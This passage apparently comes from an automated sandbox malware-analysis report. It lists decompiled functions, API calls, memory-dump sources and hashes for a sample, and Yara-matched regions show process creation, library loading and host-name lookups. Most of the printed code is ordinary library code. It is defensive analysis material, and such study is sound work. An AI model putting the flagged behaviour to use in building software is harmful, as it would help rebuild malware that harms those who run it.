                  0x0042cd58
                  0x0042cd68
                  0x0042cd6b
                  0x0042cd6d
                  0x0042cd7d

                  APIs
                  • SaveDC.GDI32(?), ref: 0042CD3A
                  • GetStockObject.GDI32(0000000D), ref: 0042CD48
                  • SelectObject.GDI32(00000000,00000000), ref: 0042CD58
                  • SaveDC.GDI32(00000000), ref: 0042CD5D
                  • SelectObject.GDI32(00000000,?), ref: 0042CD6B
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$SaveSelect$Stock
                  • String ID:
                  • API String ID: 2785865535-0
                  • Opcode ID: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction ID: d072d42024ffe69d130f0e67522b41d9a784e59db6b74b44c5ac60acea8468f4
                  • Opcode Fuzzy Hash: 82face962706b280c00cf35c0872dcee93cbb3a9cb6f5d9acb2b93f4f3afb489
                  • Instruction Fuzzy Hash: BCF06D35500A14EFC7219FA6DD48D1BBBF5FB85710B104839E14652520C771FD05DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041C322, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 235windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0041C322(void* __ebx, int __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t91;
				intOrPtr _t95;
				signed short _t97;
				signed short _t98;
				signed short _t101;
				signed short _t103;
				signed short _t108;
				signed short _t114;
				signed int* _t118;
				signed short _t132;
				signed short _t135;
				signed short _t139;
				signed short _t140;
				signed short _t162;
				intOrPtr* _t167;
				signed short _t178;
				signed short _t192;
				intOrPtr* _t196;
				int _t198;
				intOrPtr* _t199;
				void* _t200;

				_push(0x3c);
				E00431A9B(E0044B99F, __ebx, __edi, __esi);
				_t198 = __ecx;
				 *(_t200 - 0x10) = __ecx;
				_t196 = E0040F898(__ecx);
				_t91 = E0041E9BB(0x44ff98, _t196);
				_t202 = _t91;
				if(_t91 == 0) {
					_t196 = E00403AA0();
				}
				E00404A80(_t200 - 0x48);
				 *((intOrPtr*)(_t200 - 0x38)) = _t196;
				 *((intOrPtr*)(_t200 - 0x44)) =  *((intOrPtr*)(_t198 + 0x54));
				 *((intOrPtr*)(_t200 - 0x3c)) = _t198;
				_t199 = E0041E928( *(_t200 + 0x10), _t202);
				if(_t199 != 0) {
					_t95 =  *((intOrPtr*)(_t200 + 0x14));
					 *((intOrPtr*)(_t199 + 0xa8)) = _t95;
					 *((intOrPtr*)( *_t196 + 0x168))(1, _t95);
					_t97 = E00404461(__eflags, 0xa8);
					 *(_t200 + 0x10) = _t97;
					 *(_t200 - 4) = 0;
					__eflags = _t97;
					if(__eflags == 0) {
						_t98 = 0;
						__eflags = 0;
					} else {
						_t98 = E0042DDDF(_t97, __eflags);
					}
					 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
					 *(_t199 + 0xac) = _t98;
					_t101 = E0041E9BB("�IE",  *((intOrPtr*)( *_t196 + 0x148))());
					 *(_t200 + 0x10) = _t101;
					__eflags = _t101;
					if(_t101 == 0) {
						_t191 =  *(_t200 + 8) & 0x0000ffff;
						_t103 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))(_t196,  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
						__eflags = _t103;
						if(_t103 == 0) {
							goto L9;
						}
						 *( *(_t199 + 0xac) + 0x58) = 1;
						goto L25;
					} else {
						_t132 = E0041E9BB(0x4549cc,  *((intOrPtr*)( *(_t200 - 0x10) + 0x54)));
						 *(_t200 - 0x14) = _t132;
						__eflags = _t132;
						if(_t132 != 0) {
							_t178 =  *(_t200 + 0x10);
							_t192 =  *(_t178 + 0x10c);
							 *(_t200 - 0x10) = _t192;
							__eflags = _t192;
							if(_t192 == 0) {
								 *(_t200 - 0x10) =  *(_t178 + 0x108);
							}
							 *((intOrPtr*)( *_t132 + 0x110))(0);
							__eflags =  *(_t200 - 0x10);
							if( *(_t200 - 0x10) == 0) {
								goto L9;
							} else {
								_t191 =  *(_t200 + 8) & 0x0000ffff;
								_t135 =  *((intOrPtr*)( *( *(_t199 + 0xac)) + 0x180))( *(_t200 - 0x10),  *(_t200 + 8) & 0x0000ffff, 0x2800, 0xe802);
								__eflags = _t135;
								if(_t135 == 0) {
									goto L9;
								}
								 *( *(_t199 + 0xac) + 0x58) = 1;
								E00420CB9( *(_t199 + 0xac),  *(_t200 + 0x10));
								 *(_t200 - 0x10) = 0;
								 *(_t200 + 8) = 0;
								 *(_t200 - 4) = 1;
								_t139 = E0041B4D2( *(_t200 + 0x10), _t200 + 8);
								__eflags = _t139;
								if(_t139 < 0) {
									E0041B4A1( *(_t200 + 0x10), _t200 + 8);
									 *(_t200 - 0x10) = 1;
								}
								_t140 =  *(_t200 + 8);
								__eflags = _t140;
								if(_t140 != 0) {
									 *((intOrPtr*)( *_t140 + 0x14))(_t140, _t200 - 0x34);
									_t191 = _t200 - 0x34;
									 *((intOrPtr*)( *( *(_t200 - 0x14)) + 0x12c))(_t200 - 0x34,  *(_t200 + 8),  *(_t200 - 0x10));
									_t140 =  *(_t200 + 8);
								}
								 *(_t200 - 4) =  *(_t200 - 4) | 0xffffffff;
								 *( *(_t200 + 0x10) + 0x154) = 1;
								__eflags = _t140;
								if(_t140 != 0) {
									 *((intOrPtr*)( *_t140 + 8))(_t140);
								}
								L25:
								 *((intOrPtr*)(_t200 - 0x24)) = 0;
								 *((intOrPtr*)(_t200 - 0x20)) = 0;
								 *((intOrPtr*)(_t200 - 0x1c)) = 0;
								 *((intOrPtr*)(_t200 - 0x18)) = 0;
								_t114 =  *((intOrPtr*)( *_t199 + 0x54))(0, 0, 0x50800000, _t200 - 0x24, _t196, 0xe900, _t200 - 0x48);
								_t167 = _t196;
								__eflags = _t114;
								if(_t114 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x14)) + 0xc)) = E0040835B(_t167);
									_t118 = E0040835B( *((intOrPtr*)( *_t196 + 0x148))());
									__eflags = _t118;
									if(__eflags != 0) {
										_t191 =  *_t118;
										 *((intOrPtr*)( *_t118 + 0x168))(0, _t118, _t118);
									}
									__eflags = E0041BD1E(0, _t199, _t191, _t196, _t199, __eflags,  *((intOrPtr*)(_t200 + 0xc)));
									if(__eflags != 0) {
										E00408362(_t196, _t199, 1);
										SendMessageA( *( *(_t199 + 0xac) + 0x20), 0x363, 1, 0);
										 *((intOrPtr*)( *_t196 + 0x150))(1);
										UpdateWindow( *(_t196 + 0x20));
									} else {
										E0041B668(_t199, __eflags);
									}
									_t108 = 1;
									__eflags = 1;
									goto L33;
								}
								 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
								L12:
								 *((intOrPtr*)(_t199 + 0xa8)) = 0;
								 *((intOrPtr*)( *_t199 + 4))(1);
								goto L3;
							}
						}
						L9:
						 *((intOrPtr*)( *_t196 + 0x168))(0,  *((intOrPtr*)(_t200 + 0x14)));
						_t162 =  *(_t199 + 0xac);
						__eflags = _t162;
						if(_t162 != 0) {
							 *((intOrPtr*)( *_t162 + 4))(1);
						}
						 *(_t199 + 0xac) = 0;
						goto L12;
					}
				} else {
					L3:
					_t108 = 0;
					L33:
					return E00431B73(_t108);
				}
			}
























                  0x0041c322
                  0x0041c329
                  0x0041c32e
                  0x0041c330
                  0x0041c338
                  0x0041c340
                  0x0041c347
                  0x0041c349
                  0x0041c350
                  0x0041c350
                  0x0041c355
                  0x0041c360
                  0x0041c363
                  0x0041c366
                  0x0041c36e
                  0x0041c374
                  0x0041c37d
                  0x0041c381
                  0x0041c38d
                  0x0041c398
                  0x0041c39e
                  0x0041c3a1
                  0x0041c3a4
                  0x0041c3a6
                  0x0041c3b1
                  0x0041c3b1
                  0x0041c3a8
                  0x0041c3aa
                  0x0041c3aa
                  0x0041c3b3
                  0x0041c3b7
                  0x0041c3cd
                  0x0041c3d4
                  0x0041c3d7
                  0x0041c3d9
                  0x0041c513
                  0x0041c52b
                  0x0041c531
                  0x0041c533
                  0x00000000
                  0x00000000
                  0x0041c53f
                  0x00000000
                  0x0041c3df
                  0x0041c3ea
                  0x0041c3f1
                  0x0041c3f4
                  0x0041c3f6
                  0x0041c431
                  0x0041c434
                  0x0041c43a
                  0x0041c43d
                  0x0041c43f
                  0x0041c447
                  0x0041c447
                  0x0041c44f
                  0x0041c455
                  0x0041c458
                  0x00000000
                  0x0041c45a
                  0x0041c45a
                  0x0041c474
                  0x0041c47a
                  0x0041c47c
                  0x00000000
                  0x00000000
                  0x0041c48b
                  0x0041c498
                  0x0041c49d
                  0x0041c4a0
                  0x0041c4aa
                  0x0041c4b1
                  0x0041c4b6
                  0x0041c4b8
                  0x0041c4c1
                  0x0041c4c6
                  0x0041c4c6
                  0x0041c4cd
                  0x0041c4d0
                  0x0041c4d2
                  0x0041c4db
                  0x0041c4e9
                  0x0041c4ed
                  0x0041c4f3
                  0x0041c4f3
                  0x0041c4f9
                  0x0041c4fd
                  0x0041c507
                  0x0041c509
                  0x0041c50e
                  0x0041c50e
                  0x0041c546
                  0x0041c55f
                  0x0041c562
                  0x0041c565
                  0x0041c568
                  0x0041c56b
                  0x0041c56e
                  0x0041c570
                  0x0041c572
                  0x0041c58d
                  0x0041c59c
                  0x0041c5a1
                  0x0041c5a3
                  0x0041c5a5
                  0x0041c5ac
                  0x0041c5ac
                  0x0041c5bc
                  0x0041c5be
                  0x0041c5ce
                  0x0041c5e4
                  0x0041c5f0
                  0x0041c5f9
                  0x0041c5c0
                  0x0041c5c2
                  0x0041c5c2
                  0x0041c601
                  0x0041c601
                  0x00000000
                  0x0041c601
                  0x0041c57a
                  0x0041c41d
                  0x0041c41d
                  0x0041c429
                  0x00000000
                  0x0041c429
                  0x0041c458
                  0x0041c3f8
                  0x0041c400
                  0x0041c406
                  0x0041c40c
                  0x0041c40e
                  0x0041c414
                  0x0041c414
                  0x0041c417
                  0x00000000
                  0x0041c417
                  0x0041c376
                  0x0041c376
                  0x0041c376
                  0x0041c602
                  0x0041c607
                  0x0041c607

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C329
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • SendMessageA.USER32(?,00000363,00000001,00000000), ref: 0041C5E4
                  • UpdateWindow.USER32(?), ref: 0041C5F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3MessageSendUpdateWindow_malloc
                  • String ID: IE
                  • API String ID: 291802051-3275544015
                  • Opcode ID: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction ID: d0b6d8a432cfeddc55617652b4a4c4f0c68d15cc15fa885d4595bbb90d12322d
                  • Opcode Fuzzy Hash: 2e68bd0ae61063ed93b13c8ce44b8d9f28524add92b49c011ad9828dbfab3aff
                  • Instruction Fuzzy Hash: 7A917C70600215EFCB04DFA5C888AEEB7B5FF48304F20852EF8569B391DB79A981CB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023EA312, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 023EA558
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ,"E$$DKM]$g{2=
                  • API String ID: 1029625771-544385820
                  • Opcode ID: 47e33a7a0c286bf7f60103329fa84ea8ca0cdba379a8828e1e74b28630b792aa
                  • Instruction ID: db7d75899644433ff456f4a317d3461e35c9eca4d7e7a7a45790d753e3663fab
                  • Opcode Fuzzy Hash: 47e33a7a0c286bf7f60103329fa84ea8ca0cdba379a8828e1e74b28630b792aa
                  • Instruction Fuzzy Hash: 0751C8B4C4536DCBEB20DF969A81B8DBB71FB01304F608699C5693B315DB700A86CFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED163, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                  Download Yara Rule
                  APIs
                  • GetComputerNameW.KERNEL32(?,?), ref: 023ED179
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 023ED1A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide
                  • String ID: 494126_D1A8F11D$X
                  • API String ID: 4013585866-2529105192
                  • Opcode ID: 516543abb59b67773448a3e45c91e25de301463041cc1159f8e9feb3fcfce9a4
                  • Instruction ID: 2d48876fe643f95c6c6b9b32050273eb2813ee910b0475dff55be163c5dec98c
                  • Opcode Fuzzy Hash: 516543abb59b67773448a3e45c91e25de301463041cc1159f8e9feb3fcfce9a4
                  • Instruction Fuzzy Hash: E4118071D4112DAADF60D6A89D04BEF777DAF09304F100006EE47F61C0EB604A0F87A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023E1CC2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1CF2
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1D12
                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 023E1D1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D
                  • API String ID: 2922976086-2746444292
                  • Opcode ID: f11a84c4d114192b81c9d2f198761c1e25a75ba4763b5f1f971499e194803e8b
                  • Instruction ID: 047c1d937ae0e327e404fc4315923c7ad2eb256ddb3926fcf2cc30b3dcf7fba9
                  • Opcode Fuzzy Hash: f11a84c4d114192b81c9d2f198761c1e25a75ba4763b5f1f971499e194803e8b
                  • Instruction Fuzzy Hash: B3F0C872900118ABDF11DEA5EC04AFFB7BEEF45311F104426EE1BE6184EB709D08C690
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004103CD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004103CD(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E00424385(0xc);
				_push(E0040F587);
				_t26 = E004205C8(__ebx, 0x4664a8, __edi, _t25, _t27);
				_t28 = _t26;
				if(_t26 == 0) {
					E00406436(__ebx, 0x4664a8, __edi, _t26, _t28);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E004243F7(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E0040D5D6(_t21, 0x4664a8, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}










                  0x004103cd
                  0x004103cd
                  0x004103cd
                  0x004103d5
                  0x004103da
                  0x004103e9
                  0x004103eb
                  0x004103ed
                  0x004103ef
                  0x004103ef
                  0x004103f4
                  0x004103f8
                  0x00410432
                  0x00410434
                  0x00000000
                  0x004103fa
                  0x004103fa
                  0x004103ff
                  0x00410405
                  0x0041040a
                  0x00410416
                  0x0041041c
                  0x0041041f
                  0x00410421
                  0x00000000
                  0x00000000
                  0x00410426
                  0x0041042c
                  0x0041042c
                  0x00000000
                  0x0041040c

                  APIs
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                    • Part of subcall function 00424385: InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                    • Part of subcall function 00424385: LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                    • Part of subcall function 00424385: EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 004205C8: __EH_prolog3_catch.LIBCMT ref: 004205CF
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00410416
                  • FreeLibrary.KERNEL32(?), ref: 00410426
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                  • String ID: HtmlHelpA$hhctrl.ocx
                  • API String ID: 2853499158-63838506
                  • Opcode ID: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction ID: 2d4502df0f2be6acf12af82616466bd765ca29f1fd83309a5bbf0ced49f2de9c
                  • Opcode Fuzzy Hash: a7c92174e9797cb4f2285bf7dc8b88012e369848523b048c23d7c60f8b65bce2
                  • Instruction Fuzzy Hash: C101DF31240716BBDB216F62ED05B9B3A90EF00725F50C42BFD4AA6592DBB8D8D0C62D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023ED5A8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcpyW.KERNEL32(?,023F2C18), ref: 023ED5B3
                  • lstrlenW.KERNEL32(?,?,023ED6D9,?,000CD140), ref: 023ED5BA
                  • GetTickCount.KERNEL32 ref: 023ED5CA
                    • Part of subcall function 023E1E8F: GetTickCount.KERNEL32 ref: 023E1EA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659738344.00000000023E1000.00000020.00000001.sdmp, Offset: 023E1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_23e1000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$lstrcpylstrlen
                  • String ID: C:\Windows\SysWOW64
                  • API String ID: 1913473829-2716745322
                  • Opcode ID: 1efb3f716250f4cfb6783dda61b1f53c0a0603152a7f04d6eadb75d2c36462a3
                  • Instruction ID: 694da0c8f376bdf41d5f9e128769e8ed98ccc728c32884166d96641e58a28ca3
                  • Opcode Fuzzy Hash: 1efb3f716250f4cfb6783dda61b1f53c0a0603152a7f04d6eadb75d2c36462a3
                  • Instruction Fuzzy Hash: C4F02B636583046BE7245FE4FC89A523365EF84721F14D4B6E909DF296EBB4C84487E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043E7E7, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 65%
                  			E0043E7E7() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x456108;
					_v28 =  *0x456100;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                  0x0043e7ec
                  0x0043e7f4
                  0x0043e80b
                  0x0043e7b7
                  0x0043e7c0
                  0x0043e7cc
                  0x0043e7cf
                  0x0043e7d2
                  0x0043e7d4
                  0x0043e7d7
                  0x0043e7dc
                  0x0043e7e6
                  0x0043e7de
                  0x0043e7e2
                  0x0043e7e2
                  0x0043e7f6
                  0x0043e7fc
                  0x0043e804
                  0x00000000
                  0x0043e806
                  0x0043e806
                  0x0043e80a
                  0x0043e80a
                  0x0043e804

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,00434742), ref: 0043E7EC
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043E7FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction ID: 47c6caf6fecddeb87b6d1ac5e622b5b37c24e015e1786739191dd9ee142ae4fe
                  • Opcode Fuzzy Hash: 90fb7d41d80d8563707bc5f7171b751eef93604b39a71be3eca5469cfeb1f5ed
                  • Instruction Fuzzy Hash: 5CF03030A00A09E2DF002BB6BC0E76F7A74BB84747FA204A1E591B11D6DF35C475D25A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004391D4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004391D4(intOrPtr* __eax, intOrPtr __edi) {
				intOrPtr _t10;
				intOrPtr* _t12;

				_t10 = __edi;
				if(__edi == 0 || __eax == 0) {
					return 0;
				} else {
					_t12 =  *__eax;
					if(_t12 != __edi) {
						 *__eax = __edi;
						E00439086(__edi);
						if(_t12 != 0) {
							E00439115(_t12);
							if( *_t12 == 0 && _t12 != 0x463b50) {
								E00438F3D(_t12);
							}
						}
					}
					return _t10;
				}
			}





                  0x004391d4
                  0x004391d6
                  0x00439211
                  0x004391dc
                  0x004391dd
                  0x004391e1
                  0x004391e4
                  0x004391e6
                  0x004391ee
                  0x004391f1
                  0x004391fa
                  0x00439205
                  0x0043920a
                  0x004391fa
                  0x004391ee
                  0x0043920e
                  0x0043920e

                  APIs
                  • ___addlocaleref.LIBCMT ref: 004391E6
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 00439098
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390A5
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390B2
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390BF
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390CC
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 004390E8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(8BF4428D), ref: 004390F8
                    • Part of subcall function 00439086: InterlockedIncrement.KERNEL32(?), ref: 0043910E
                  • ___removelocaleref.LIBCMT ref: 004391F1
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043912F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043913C
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439149
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439156
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 00439163
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043917F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 0043918F
                    • Part of subcall function 00439115: InterlockedDecrement.KERNEL32(?), ref: 004391A5
                  • ___freetlocinfo.LIBCMT ref: 00439205
                    • Part of subcall function 00438F3D: ___free_lconv_mon.LIBCMT ref: 00438F83
                    • Part of subcall function 00438F3D: ___free_lconv_num.LIBCMT ref: 00438FA4
                    • Part of subcall function 00438F3D: ___free_lc_time.LIBCMT ref: 00439029
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
                  • String ID: P;F
                  • API String ID: 467427115-821099583
                  • Opcode ID: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction ID: 61ced1987d1eff592f3a7abbb9b964a4908a5711a4a26ed9b6d79d1087f2f2aa
                  • Opcode Fuzzy Hash: f0e6cb0af9fd6effd16fa1cead2d76f3cdf8573a14f94cabc2d81ef908cc436e
                  • Instruction Fuzzy Hash: 05E04F32501D22358E3629196410AABB2942F8E719F1A299BF834A7359EBEC4C8080AD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424340, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424340(void* __eax, void* __ebx, void* __edx, void* __edi) {
				void* _t5;

				_t5 = __eax;
				 *((intOrPtr*)(__ebx + __edi - 1)) =  *((intOrPtr*)(__ebx + __edi - 1)) + __edx;
			}




                  0x00424340
                  0x00424346

                  APIs
                  • DeleteCriticalSection.KERNEL32(00466878), ref: 0042435D
                  • DeleteCriticalSection.KERNEL32(004666E0), ref: 0042436F
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalDeleteSection
                  • String ID: xhF$fF
                  • API String ID: 166494926-2610004491
